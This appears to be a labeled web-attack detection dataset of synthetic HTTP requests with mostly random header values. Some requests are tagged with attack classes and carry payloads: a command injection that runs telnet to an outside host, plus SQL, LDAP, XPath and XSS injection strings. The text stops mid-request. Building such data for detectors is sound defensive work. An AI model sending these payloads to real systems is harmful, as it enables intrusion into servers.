If-Range: Sun, 12 Jun 05 01:03:43 GMT
Max-Forwards: 19
MIME-Version: 8.5
Pragma: neEoha='s'
Proxy-Authorization: tnrr qtclsQSi=e3eg
Authorization: Basic NWJjcjBMOnNpeW51Yg==
Range: 7-59040
Referer: http://sao1zwse.biz/ynpn/auremmj.nsf
TE: trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/9.8 (compatible; MSIE 1.9; WinNT; tm2ee0meei)
UA-CPU: x86
UA-Disp: 3013,748,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 733x829
Via: 4.3 70.53.26.31, 1.6 www.mya0re.png, HTTP/1.6 www.dapohr6t.jpg
Transfer-Encoding: gzip
Upgrade: ihs/6.9, sw1v/7.0, tkg/8.2, rtlu/7.8, heTt/3.6
Warning: 210 56.86.237.225 "csttoifnOdeql" "Sat, 01 Mar 08 16:31:34 CET"
X-Forwarded-For: 25.37.30.27
X-Serial-Number: 029543372781579317
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42492
Start - Id: 8045
class: Valid
POST /u1cE8h-e0c5ilIKnNo0P.tiff? HTTP/1.1
Content-Length: 40
Content-Language: rrs,Eatrlrb
Content-Encoding: gzip
Content-Location: http://eqos.com/Dtoaw/ydh1C/ocapeanl.css
Content-MD5: dHBUbnR5dGhvSHNlb1RwQg==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 30 Apr 09 21:54:14 CET
Last-Modified: Sat, 13 Jan 07 18:24:44 UTC
Host: 246.43.209.173
Connection: nsfm
Accept: text/*;q=0.7
Accept-Charset: *
Accept-Encoding: identity, compress;q=0.4, gzip
Accept-Language: irg-hdOthhnk;q=0.0, p1xth3wt-k1m;q=0.8, s4sgInb-nnscor;q=0.7
Cache-Control: no-store
Client-ip: 245.92.71.70
Cookie: rpmFvJfelikej5=eKGhfbq3Tyuo;6ss5pmhn0Tdatx=3940987;HW1m_Vzcexec=MNe;altofqhnoEdsahe='2wr3ocsamtxru;n5l=0034
Cookie2: $Version="39"
Date: Sun, 30 Dec 07 17:42:27 UTC
ETag: W/"Xg0_ImD@4MMNOFhP@FU"
Expect: it1lg=n72awDr;sNtkmor6
From: hEe6lhu@edne.be
If-Modified-Since: Tue, 02 Nov 04 09:55:36 UTC
If-Unmodified-Since: Wed, 14 Feb 07 16:17:59 UTC
If-Match: "xBJtUSSymk6YJGtylTT"
If-None-Match: "a5zaBp4TfjkwtVj"
If-Range: "70-kgkzXploj-63hyYmn"
Max-Forwards: 6
MIME-Version: 9.0
Pragma: no-cache
Proxy-Authorization: NTLM dGJ0dHd1b1RvYW1pZmhsOWN5RW13bWRpZWI4YXN1M29v
Authorization: NTLM T3c2ZXl3MWlhcmk0QWJzYWF3b3JpbzBpaGx0OHJya3Roa2FIYmI=
Range: -514,0-
Referer: /Aidw/tNir1l/uhenm66c/6sbdanOe.msf
TE: gzip,chunked;q=0.3
Trailer: Accept-Language
User-Agent: erss7dsr2qseeiihE
UA-CPU: x86
UA-Disp: 366,284,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 981x443
Via: 8.8 35.80.101.234
Transfer-Encoding: deflate
Upgrade: qnl/0.2, tw2Ka0/3.0
Warning: 757 69.220.219.157 "niueehhZda" "Mon, 28 Nov 05 14:54:37 GMT"
X-Forwarded-For: 243.241.144.79
X-Serial-Number: 0062136234321129
----: ----------------------------
~~~~~: ~~~~~~~~~~

sntqenri=dlfoo4cbthr1nq&jloisAogmtes8s=7

End - Id: 8045
Start - Id: 24352
class: Valid
GET /7e5.cgi?tmhsgelo=2481458&hkOieOif=nKSB&hYDV=316544479&wo=d01&SlNUmrhbt=bselectuchild&rwd=eimg2s&yvpAyt=7aaan+r%29&lEsimexi=ymr&bcbaItmtea=e5mi5X&n1kt=fqaD4AOd.A&qldaarStsiu=700667013&2bhDpecFrNciT=sc8eoqh9aclIorwgne&eHp4s=19027&snxldetdLeS0t=09 HTTP/1.1
Host: 187.80.251.40:5
Connection: keep-alive
Accept: application/zip;q=0.6, application/postscript, application/*
Accept-Charset: iso-8859-6;q=0.4, isiri-3342;q=0.1
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-stale=5
Client-ip: 114.108.65.238
Cookie: ioysad7nh=yh;s4yb=libos~eu;CTtoeeit9l8i=mOlfiorCiaeehoo;Ten9eeoha=%nt6;let6hnottthe=411060
Cookie2: $Version="7"
Date: Thu, 19 Nov 09 22:06:18 CET
ETag: W/"sv4X_A-raIUd8Q5Y"
Expect: 100-continue
From: 5hRu@STpwssetis.be
If-Modified-Since: Mon, 13 Oct 08 19:01:16 UTC
If-Unmodified-Since: Fri, 11 Jan 08 10:01:27 GMT
If-Match: "RuNHC@wzTGCZV_n88"
If-None-Match: "8FEmDbkYWDxsyIyiyO"
If-Range: Sun, 28 Mar 10 20:11:59 UTC
Max-Forwards: 148
MIME-Version: 5.2
Pragma: emO=t0de
Proxy-Authorization: NTLM c29ib2V0ZXB6dGpzc2k2bm1vcnJoYWV0SXQwZ3RvczZ0bg==
Authorization: NTLM dU9yMWRmeDB3dGV0MHNSd2JsRGR0aTJodklvRWVubzduZw==
Range: -290,922508-,-602
Referer: http://Sacn.net/haeIrnE/3btus/etqajei.asp
TE: trailers
Trailer: User-Agent
User-Agent: itplaimni7ooyGa1
UA-CPU: StrongARM
UA-Disp: 801,8735,8
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 352x5203
Via: 0.2 www.6akrB.png:26, 6.3 165.149.219.23, HTTP/2.4 www.htsoee.png
Transfer-Encoding: identity
Upgrade: Hiu/7.2, tsosIp/1.1, 2cq/2.4, jea8Dd/0.5
Warning: 748 www.Nint.js:86733 "me6otyateqi77lTde" "Tue, 01 Mar 05 01:32:17 CET"
X-Forwarded-For: 73.2.112.190
X-Serial-Number: 6737813475044771
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24352
Start - Id: 43307
class: OsCommanding
GET /0I/e-4-A2sa8XQTqrG9/7h@wKhS_9/9tfsruH4G-uZJVu/nJd1Wn/eMwi2Abo1A/3njoHoOvesttdemib6/iihaRLhznm/lQI78QhbGXkxYrEV/I2tmp4a.gif?xadhheais=842&ye=etoee1lnijryht8t7&lre=efihc&JB8HLstdinC=ose&xoeregioUtoh=%5C%22%5C%3B%5C%2Fusr%5C%2Fbin%5C%2Ftelnet+www.trraat.com+182+++%3B&Nh-lmJQN1=%5Bopenhl9eet&pej2=mw26MX_18&Esb=D-wrOdhTl&rqCt_4HahttpsxZy=19249&sqgghto=31626609 HTTP/1.0
Host: 0.64.95.216:80
Connection: close
Accept: application/*, application/x-tar, text/*
Accept-Charset: gb2312;q=0.3, windows-1251;q=0.3
Accept-Encoding: 
Accept-Language: Syt-6o7n8lp;q=0.2, apas-hsad;q=0.0, taRaetn-u
Cache-Control: no-cache
Client-ip: 30.158.67.212
Cookie: fdUei=0Tk0AmFe;.mZASPE5=ld5ztctacbaped
Cookie2: $Version="21"
Date: Sun, 30 Jul 06 23:08:33 CET
ETag: "R9o82xN8kyAh79Fd2g"
Expect: eclgy=sefh
From: ehhmnsme@ohym.uk
If-Modified-Since: Thu, 25 Jan 07 20:34:29 UTC
If-Unmodified-Since: Tue, 22 Jan 08 16:48:22 GMT
If-Match: "bo.nYMc.KHOEAqWVu"
If-None-Match: "JFWi6FNoqeZXJvge0W"
If-Range: Mon, 19 Sep 05 05:23:10 UTC
Max-Forwards: 69
MIME-Version: 7.9
Pragma: no-cache
Proxy-Authorization: Basic bG5zcDp0b2lia3Nhbw==
Authorization: NTLM ZXIzWmhzd2Z5dEZkczNzYWVkOW5zU2hFbDZwb1R6bmFlbnRLMGlmdw==
Range: 398265-
Referer: http://nebbj8.net/oautp/7iss/oupe.pl
TE: trailers,chunked;q=0.3
Trailer: Cache-Control
User-Agent: Mozilla/0.7 (X11; U; SunOS sun4u 1.9; os-tC; rv:1.3.0) Gecko/68754977
UA-CPU: StrongARM
UA-Disp: 260,218,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 3321x719
Via: 3.4 16.51.69.58, FTP/7.7 www.oeriltx.htm
Transfer-Encoding: compress
Upgrade: svhC/6.6, eeeovf/0.6, Rs9jj/2.4, inuc/6.8
Warning: 597 167.142.104.140 "ureioenlrkas6ps" 
X-Forwarded-For: 31.255.144.84
X-Serial-Number: 33268910997830583
----: ---------------
~~~~~: ~~~~~~~~~~

null

End - Id: 43307
Start - Id: 38384
class: LdapInjection
GET /iMN/tNo.png?nqsfsilaokepi8k=shkhtaccess9yu&uOuRvses=aDht82Z0ix9&vfAub8fda=foelxhcu&uSiai2fu1dal=J%7Coas&20Otvcfslog=%29++%28%7C++%28displayName%3Dhad*%29+++%28name+++%3D++had*%29%28+mail%3Dhad*+%29&oa=AsMiinamhom8eh&lBj0fX5O=tlcun+%3BhomeietSoi6r%3Ato&E6wB_8b23=670&tckoet=bES&haueamp3nnD5=7501&deleteRgj@-sock_streamvv=87&m1thwnogo3e=875483&aeiNoaa=ooeeknd5yp%26 HTTP/1.0
Host: www.msEe.fr
Connection: keep-alive
Accept: text/html;q=0.6
Accept-Charset: iso-8859-1;q=0.7
Accept-Encoding: deflate;q=0.3, compress, identity, gzip;q=0.8
Accept-Language: lsMzthdi-nqnsat1, htHyt-rre8;q=0.0, f-ey;q=0.6
Cache-Control: no-cache
Client-ip: 64.84.236.66
Cookie: passwd9KPT=iiT;TnddoxhcciiqDs==Th+ih;nh9o=9283;eyadasjjethanho= %ufo7rrFrmeerrxp_t;litedptnozgPesi=nAxy43.R
Cookie2: $Version="0"
Date: Sat, 27 Mar 10 04:39:17 CET
ETag: W/"yNFl3unHM9j-nY_lvkD"
Expect: uFhie
From: e3ig@cUsnasr.com
If-Modified-Since: Fri, 02 Feb 07 24:28:00 GMT
If-Unmodified-Since: Sat, 08 Jul 06 05:35:59 CET
If-Match: "Gk7arPnYhjnnwlU1FqI8"
If-None-Match: *
If-Range: Thu, 14 Jan 10 16:11:26 UTC
Max-Forwards: 6
MIME-Version: 7.6
Pragma: siad='Ea'
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: eNFens l1wdt8n=iPqidlhr
Range: 5-3896,18685-499682,-36
Referer: http://www.r2timr.biz/9mese/esay.asp
TE: gzip;q=0.1
Trailer: Accept-Encoding
User-Agent: Mozilla/2.6 (Windows; U; Win 9x 1.6; la-ml; rv:4.4.2) Gecko/16989868
UA-CPU: 68000
UA-Disp: 6597,6108,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 6780x4829
Via: ocess5/0.8 181.220.211.32, g3ewgb/3.0 www.wed6y.js
Transfer-Encoding: deflate
Upgrade: ottf/8.1, nEtN/4.3, m1n4n/1.7, fN2/3.2, attfJ/3.6
Warning: 306 www.u4zhxszn.shtml "rahmw" 
X-Forwarded-For: 120.14.244.116
X-Serial-Number: 85165873223938
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38384
Start - Id: 2673
class: Valid
GET /tvdR7lA8vOsIqFyM/aemdstsuiprte/oMOA7ez-MAfUcN9.K/ePWm-FYezm1KwhuE6wW0/leE5eeyae4gOEUTc9.jpeg? HTTP/1.1
Host: www.9as2ea.org
Connection: keep-alive
Accept: video/mpeg, video/quicktime;q=0.3, audio/*
Accept-Charset: x-mac-icelandic, big5;q=0.9
Accept-Encoding: *
Accept-Language: raS-m;q=0.0, clRhzc6O-0Ritre1v, enf-sn;q=0.8, cans2fse-ia
Cache-Control: no-cache
Client-ip: 97.1.7.203
Cookie: rahajcToHwe2an=rxePvin00fhzeer;mpsn2hmea=thu;ty=94
Cookie2: $Version="737"
Date: Sat, 31 Jan 09 20:52:14 UTC
ETag: W/"YgfCl574zFZDDyBiItIN"
Expect: 100-continue
From: ovamHuqy@MlywzI.fr
If-Modified-Since: Sat, 01 Nov 08 12:12:37 GMT
If-Unmodified-Since: Sat, 15 Jan 05 10:55:10 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 1
MIME-Version: 0.8
Pragma: gofLy='qi2eE6'
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: inlm s5tll0w=c91te
Range: -23,-6679
Referer: http://www.urIne5cO.net/4tAE.msf
TE: trailers,deflate
Trailer: Expect
User-Agent: dwvRoFesfidp
UA-CPU: x86
UA-Disp: 6089,3163,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 486x934
Via: 1.8 www.aredte.htm, 1.6 www.2LdtrUEa.jpg, ttfk0Q/5.2 www.ahcHEs.jpeg
Transfer-Encoding: compress
Upgrade: eee3w/3.5
Warning: 749 www.okXda0.jpeg:63 "nQde" 
X-Forwarded-For: 94.59.133.217
X-Serial-Number: 8136074594585
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2673
Start - Id: 49464
class: XPathInjection
GET /u528REyUE/rsnen6hnsaEqrcr/gmh6s/eus/i4locationWf/OnVL2koaccess_logQ.pl?sNgaefp3neheep=54&bt=eo1b&ebgie=oeeeasipec&sxdcHlemie=8ninsertesr&apbfiiiiahtie=lso&idFLuokn=e4xq&Juv6M4cOqscript=etZr&r2stipvlocg4n=dshutdownnUlioOnoinoc&9e7=y4erjr0%27+++++or+path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3DN%5D+or+++%27r7e%27+%3D+%27&hcatU.LQ=stjnyc&d8l7b=553033&tiwoJed=%26cm%5Ciulocationhoew%5Cd%26g9g%252&co8Erozxsl0dddy=656&jysrTar=66136171&hG2tllh=87 HTTP/1.0
Host: 39.156.233.17
Connection: jrfnveei
Accept: */*;q=0.2
Accept-Charset: cp-950;q=0.9
Accept-Encoding: 
Accept-Language: s-k, 9EScpteo-l, itEsut-rivwo;q=0.9, hn-A;q=0.2
Cache-Control: min-fresh=0
Client-ip: 26.220.54.168
Cookie: GvbscripttelnetJ9b0=zosir
Cookie2: $Version="182"
Date: Sun, 26 Apr 09 04:59:57 UTC
ETag: "SmZqfMrAN90WPwXEG8YZ"
Expect: POes=p4aun;djhEbu=gsoao
From: n5thibdN@srSdAet.st
If-Modified-Since: Tue, 25 May 04 19:26:20 GMT
If-Unmodified-Since: Sun, 18 Apr 04 04:20:28 GMT
If-Match: "sZ2xhEON3HrNh@Y"
If-None-Match: *
If-Range: "L2_eRyjXKIW6hbHqV5"
Max-Forwards: 2073
MIME-Version: 1.5
Pragma: bo02l='l'
Proxy-Authorization: NTLM dGVuaWVyaGZibGZ3c2NzN2U1ZTlyaGxVbGJENWNvZWlzZExnYWdjQXRvc0FmdDc=
Authorization: Digest uri=http://www.sauLhr.st/um6stglg/w1aaLoe/blons/Tdoty/o9ao60t.jpeg
Range: -012
Referer: http://nnasqWmo.be/rheactfe/tLS1iw/rsdul/WUtus/oenot.bin
TE: trailers
Trailer: Cache-Control
User-Agent: Mozilla/2.3 (X11; U; Open BSD i586 8.1; ha-Le; rv:7.8.4) Gecko/10224552
UA-CPU: PowerPC
UA-Disp: 247,139,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 527x1451
Via: 7.5 8.14.16.25:2, 9.8 91.199.78.228:41
Transfer-Encoding: deflate
Upgrade: 7V1i5f/9.3
Warning: 806 44.0.29.60 "Kr4gdh25nfieofeas" 
X-Forwarded-For: 64.1.22.247
X-Serial-Number: 7409387708
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49464
Start - Id: 42422
class: SqlInjection
GET /cpetch1s/cvPNkNiaxmmHi/b9TP4TtmMyK@TfO/dhmgF4nCD0pVSUhE/erhTahnde2hetqqa/jU/nCtS0ESvpzaaabk/ixCLET.jpg?rlc=87614527&wd=++++OR+2+++++%3E++1&MTiTmfei=tpCeTO_8v2x HTTP/1.0
Host: 246.9.230.159
Connection: close
Accept: video/quicktime;q=0.0, audio/basic, application/*;q=0.4
Accept-Charset: *
Accept-Encoding: 
Accept-Language: RAehe-svbz9Sct, isnebrlh-Do;q=0.0, n-sw
Cache-Control: oeen='AflmweD'
Client-ip: 88.187.116.188
Cookie: hl=d2wteffl;9XP@M2J@cconnectW=oiyab;areh=Eenwn2zwsnrtwhsni
Cookie2: $Version="157"
Date: Mon, 14 Apr 08 14:08:07 GMT
ETag: W/"ROs81ENXsNKrraDFF"
Expect: 100-continue
From: Tm9x@je4xi.it
If-Modified-Since: Sun, 17 Jul 05 23:29:55 GMT
If-Unmodified-Since: Tue, 30 Mar 04 08:10:04 GMT
If-Match: "DyIdS6qC79jRQ49jY"
If-None-Match: "pNN1.vyaxQzf9kZ"
If-Range: "X-6EH_XhtVqIr6RP7qf"
Max-Forwards: 0720
MIME-Version: 0.1
Pragma: no-cache
Proxy-Authorization: Basic aHdkZWQ6dDVtbjYzb1M=
Authorization: Digest nonce
Range: 005696-6624,4-
Referer: http://aj1espws.uk/samo9Ms/isirenia.pl
TE: gzip;q=0.6,trailers
Trailer: Trailer
User-Agent: Mozilla/6.0 (X11; U; Solaris 4.4; Uf-fT; rv:9.0.1) Gecko/50860184
UA-CPU: 68000
UA-Disp: 4009,500,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 189x646
Via: HTTP/8.6 75.65.7.131, 7.4 159.222.188.196, HTTP/9.5 162.111.39.197
Transfer-Encoding: compress
Upgrade: 3w4vo/5.2, oee9/2.0, ot6Q/5.5, ergojg/6.9, u2osoe/4.9
Warning: 781 102.8.11.215 "Yhee38R7lileIanstkb" 
X-Forwarded-For: 120.46.59.231
X-Serial-Number: 2317427
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 42422
Start - Id: 6800
class: Valid
POST /bdmEisaetcbqny/CL/rg/ataeetrlsqrtee3hhN/rawp6s6baefhuni/ZU/nwD9qk./wtiT7yrActeao.exe? HTTP/1.1
Content-Length: 220
Content-Language: hmg,uiti7i
Content-Encoding: compress
Content-Location: http://www.onerpboD.gov/osho1ueD/eurt/rnnoosn/9s7s7/irtt.mpeg
Content-MD5: Q2o3dGU0YVR1aGl4eVRFNw==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 01 Nov 07 24:43:05 GMT
Last-Modified: Fri, 01 Sep 06 11:38:24 GMT
Host: www.phisiuja.net
Connection: close
Accept: text/xml;q=0.2
Accept-Charset: *;q=0.8
Accept-Encoding: *;q=0.0
Accept-Language: *;q=0.5
Cache-Control: min-fresh=8698
Client-ip: 19.37.134.77
Cookie: 1e=beso;yn=46;zdyw= o/so5skc4f4Sl
Cookie2: $Version="327"
Date: Fri, 26 Aug 05 23:40:05 GMT
ETag: W/"HO-kbK.Uutl3mUwK.5"
Expect: ir5pu0hr=reicreEb
From: ooti@eeee.gov
If-Modified-Since: Fri, 20 Nov 09 13:09:54 UTC
If-Unmodified-Since: Tue, 16 Nov 04 07:47:00 UTC
If-Match: *
If-None-Match: *
If-Range: Sat, 01 Aug 09 15:46:57 UTC
Max-Forwards: 5
MIME-Version: 6.5
Pragma: feuedh='ihgzeh'
Proxy-Authorization: iiaIie tcfW8g=Dcareqt
Authorization: gaio tvTeae=2eI7ri
Range: 75-484,-76,208013-709
Referer: http://www.eR8q.uk/a6dbhman.nsf
TE: trailers,trailers
Trailer: If-Match
User-Agent: Mozilla/6.0 (compatible; MSIE 7.2; Open BSD i386; orOena9eth)
UA-CPU: StrongARM
UA-Disp: 293,6824,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 5438x9106
Via: FTP/3.5 101.109.176.251, FTP/3.2 14.34.91.95
Transfer-Encoding: deflate
Upgrade: eiea/2.4, rqd/4.6, saIS/8.7, ado/8.4, esS/3.7
Warning: 797 59.247.222.32 "dfucaar" 
X-Forwarded-For: 140.71.84.57
X-Serial-Number: 89698
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

gen=nG7&Eid1nph-WL.D=uW41Pp@q&r9w4eassCneeks=236&amT8wtrn=gnfshutdownroaobaf<H8&UWrnf=tlan1ceeealsesisn&ZlGXrsA=ytltmeadh&GDuS4wr6echoZ2O=nrd9I8snnoe&sebn5eevtc=dal-6a7&0ulnxsgcd=nrtzlaeMfTf&oeJse1ones=tGWG3IXjKh@Z

End - Id: 6800
Start - Id: 28052
class: Valid
GET /crKtnum/t-UuiWJXeWOuYd6.E28e/DUO78evalF2/nPK6MPjfG0IY.xApP/in/f-9mailh31wTbodyvfGU/efwsy4VyxsaUHE/hEsoli/e4dnNafs/iainnnH.exe?otutuegadwttq6=4&BTNFBizeZA=olnhps7et HTTP/1.0
Host: 81.170.17.193:80
Connection: eect
Accept: */*;q=0.3
Accept-Charset: iso-8859-5, x-mac-arabic, windows-1257, iso-2022-jp;q=0.8
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: no-transform
Client-ip: 243.95.112.170
Cookie: yEs=iiltf
Cookie2: $Version="322"
Date: Wed, 28 Jul 04 15:16:01 GMT
ETag: W/"8jQIu9B@UcxUE_Ne"
Expect: jbdp
From: gu9cDaia@ar6it9.st
If-Modified-Since: Fri, 13 Feb 04 12:38:28 CET
If-Unmodified-Since: Sat, 22 Apr 06 02:43:38 CET
If-Match: *
If-None-Match: "czKW1fG8XNrQ.2wRcklo"
If-Range: Fri, 28 May 04 19:55:07 UTC
Max-Forwards: 0122
MIME-Version: 3.4
Pragma: n=2iw
Proxy-Authorization: Basic dW5uYzp6b2NhRFRl
Authorization: NTLM WHRhRXR1bnB0b25udHRvd29sc1RldEVuYTN1Z2VyYWpndG4=
Range: -570
Referer: /eteEhs/othgtc7s/rrrhNyj.swf
TE: chunked;q=0.8
Trailer: Host
User-Agent: hQoGm3QT http://www.enmEoo1.ch
UA-CPU: MIPS
UA-Disp: 352,634,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 2111x3686
Via: h6nia/2.6 240.94.82.193, HTTP/9.7 www.dwgn7ze9.tiff:78, a1ich9/6.6 www.spE6.jpeg
Transfer-Encoding: deflate
Upgrade: oe2lo1/5.5, meme/3.9, dxyas/2.0
Warning: 759 www.rcgyueh.tiff:5 "wolidasoknadsaeahf" "Sun, 27 Jul 08 14:28:37 UTC"
X-Forwarded-For: 140.27.28.161
X-Serial-Number: 981815102258
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28052
Start - Id: 17014
class: Valid
GET /t.I6QkWLuswB/1rcess7ttr0s3ma/0X0psmlocation/uF1mUl@4IoVW.html?sedBs=0063003083&aeaNeal=axohQlQA&xkechocYs.Awo=yvVXfrWXDW&ta6t=+sAunione%2F0eubao+mn&nA=64883262&baihh9l2rn9ei2e=tansITimg%7EfN&Ht6tUriua8=9%3Deil5%3D HTTP/1.0
Host: www.te5vo8o.org
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: *;q=0.0
Accept-Language: *
Cache-Control: no-store
Client-ip: 63.127.87.192
Cookie: ra6oaoehOun=67;Ha= ptoie/ lo5;uIwfhow4sl=teixqgq9aei;md5m=8;zwaia3InYlinert=89;mcaqw4tih5slr=w7sageetbpirhdc6iy
Cookie2: $Version="16"
Date: Wed, 04 Aug 04 18:47:13 GMT
ETag: "hJb12BboFN5mB95rhhDX"
Expect: 100-continue
From: roye@rrdiYao9wh.cz
If-Modified-Since: Mon, 01 Aug 05 16:38:00 UTC
If-Unmodified-Since: Sat, 30 Jun 07 23:49:59 UTC
If-Match: "8YIPN9Sq9xLJBXO"
If-None-Match: *
If-Range: "68MVc3SuyT4vnaOt5BE"
Max-Forwards: 40
MIME-Version: 2.5
Pragma: no-cache
Proxy-Authorization: Digest uri=http://www.mqws1rq.net/2ejt/rr0e/eam4.sh
Authorization: nfz0a ztlaEec=6nset
Range: 88101-
Referer: http://7eet.com/iteee7g/hbhnedre/cthpo.jpeg
TE: trailers,chunked,trailers
Trailer: Upgrade
User-Agent: accTWnXeFI http://www.ucrm.cz
UA-CPU: StrongARM
UA-Disp: 6884,2950,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 044x401
Via: 6.5 www.ideTs89.htm:647
Transfer-Encoding: gzip
Upgrade: ttoEw/6.5, etora/0.5, nscq/3.4, car/1.9
Warning: 476 www.emOopa.jpeg "n7ceef" "Thu, 05 Jun 08 13:49:28 UTC"
X-Forwarded-For: 208.229.111.62
X-Serial-Number: 380344
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17014
Start - Id: 47634
class: XSS
GET /0jms4/8srwdAehiAe/yL1HrkeqC/eehrlwe9tib/nan7/osatcaeq3snotdor/i5AJvMeSgBb/c5T/rcFMEd0n4O0r/iBlAfdd.asmx?ptrFptihg5r=%3C%21%5BCDATA%5B%3C%21--%5D%5D++++%3E%3Cscript%3E%5Balert+++%28%27eaisiNie%27%29%3B%5D%2F%2F--%3E%3C%2Fscript+++%3E HTTP/1.1
Host: 134.12.106.33:80
Connection: close
Accept: audio/*;q=0.7, audio/*;q=0.0, video/*
Accept-Charset: *;q=0.4
Accept-Encoding: *;q=0.0
Accept-Language: *;q=0.2
Cache-Control: max-stale
Client-ip: 208.225.246.243
Cookie: HBQWyIBJQ=4724736;ws=u5w5xqW4X;H_httpsSncg.z=6QrXb;oeHitrinooo=ncu9Iuodo;dniEp7khdeyir=lNSG8f_;gcRnyeiq0oreega=hazwtdt1xiu
Cookie2: $Version="186"
Date: Mon, 08 Jun 09 07:30:08 CET
ETag: W/"vCJ4ze41NxoBsap4"
Expect: 100-continue
From: aampiq@d5vosUe.cz
If-Modified-Since: Sat, 08 Nov 08 13:16:02 UTC
If-Unmodified-Since: Wed, 09 Jan 08 05:09:11 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 8183
MIME-Version: 5.8
Pragma: stu='my'
Proxy-Authorization: NTLM cmF0YUUybGlvcmNSTGNjZDk2ZWhhcWpldG85bzFhZWV0YWttdGxvcg==
Authorization: Basic ZTV0V2ZudGI6YmFoeXBkdHQ=
Range: 51-,059585-
Referer: http://www.eaojHmo.uk/hvhl/ifhm.gif
TE: trailers,deflate;q=0.3,trailers
Trailer: Warning
User-Agent: 6t47/2.5.2.6.9
UA-CPU: StrongARM
UA-Disp: 434,760,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 3658x8516
Via: 4.8 www.oamhaaui.gif:83817
Transfer-Encoding: gzip
Upgrade: euleee/5.6, eNo/6.5, estIph/1.3
Warning: 544 147.190.206.64 "e6Olrstooilettn" 
X-Forwarded-For: 111.147.190.89
X-Serial-Number: 6943669939
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47634
Start - Id: 15074
class: Valid
GET /mnaesyoa/aouinrotduentOOfmh/e9xW3NqJvKo/sde6ukAILq80SWqR/7YZW1aIVZ7.png? HTTP/1.1
Host: www.0e4nom.biz
Connection: jErl
Accept: */*;q=0.7
Accept-Charset: x-mac-chinesesimp, iso-8859-2;q=0.9, euc-jp;q=0.5, big5, x-mac-cyrillic
Accept-Encoding: deflate;q=0.6
Accept-Language: twom-s6nbtsew, pca-a;q=0.0, 1d-cr, r-otnEqoe;q=0.7
Cache-Control: tt=tl
Client-ip: 59.230.105.90
Cookie: copyWRPc=9670074;ayace2itoixp=09148;zhO=@ti'slGcf;vbOcnph-Rxp_I1nF3=62534;NhtnTmc=ceyns( tputE;lBj6nywwinntwo=874
Cookie2: $Version="0"
Date: Mon, 05 Nov 07 15:30:56 GMT
ETag: "JV0OLiFIhzERD6l"
Expect: 100-continue
From: yoa7I@ropq1e.be
If-Modified-Since: Tue, 20 Feb 07 23:42:28 UTC
If-Unmodified-Since: Thu, 09 Jun 05 04:39:39 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 52
MIME-Version: 2.9
Pragma: bbl4n55='f'
Proxy-Authorization: Digest response="a5e6c9C505B71e1cDdCFdCdB3aF006A7"
Authorization: Digest username="2eDhw"
Range: -3610,072048-063,-8
Referer: http://amxttu4.fr/1ehTim/sotreto.swf
TE: trailers,deflate;q=0.1,chunked
Trailer: Authorization
User-Agent: t2BphMwA http://www.2ntp.com
UA-CPU: PowerPC
UA-Disp: 3763,8529,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 154x2368
Via: 8.7 www.sA0h.htm, HTTP/6.1 www.lnaanrbs.jpg, 4.7 www.hMhnti.png:8296
Transfer-Encoding: identity
Upgrade: oxpen/0.0
Warning: 532 27.1.62.77 "o9ljtfr2eo5T2tvoe" 
X-Forwarded-For: 145.80.124.77
X-Serial-Number: 618402796
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 15074
Start - Id: 33487
class: Valid
PUT /No/h0NU6hB.CyEdY/lL@laQ3Tc/ruAr/cKkkQj5b.NwprE/3rfrnvnonnIfnubs/0Uxc0/o1GoWs_0HM8vJw/i_MRJgMo-Ab/lo29PlLs4.gif? HTTP/1.1
Content-Length: 176
Content-Language: alah3L
Content-Encoding: gzip
Content-Location: http://adtn0.it/ed3r.jsp
Content-MD5: aHBzbk54bnZndXJ3b2huUg==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 11 Jul 09 19:32:24 CET
Last-Modified: Sat, 26 Jan 08 23:58:37 CET
Host: www.9jtw.it
Connection: teag
Accept: */*;q=0.8
Accept-Charset: x-mac-greek, iso-8859-1;q=0.9, iso-2022-jp
Accept-Encoding: identity
Accept-Language: *;q=0.2
Cache-Control: max-age=2
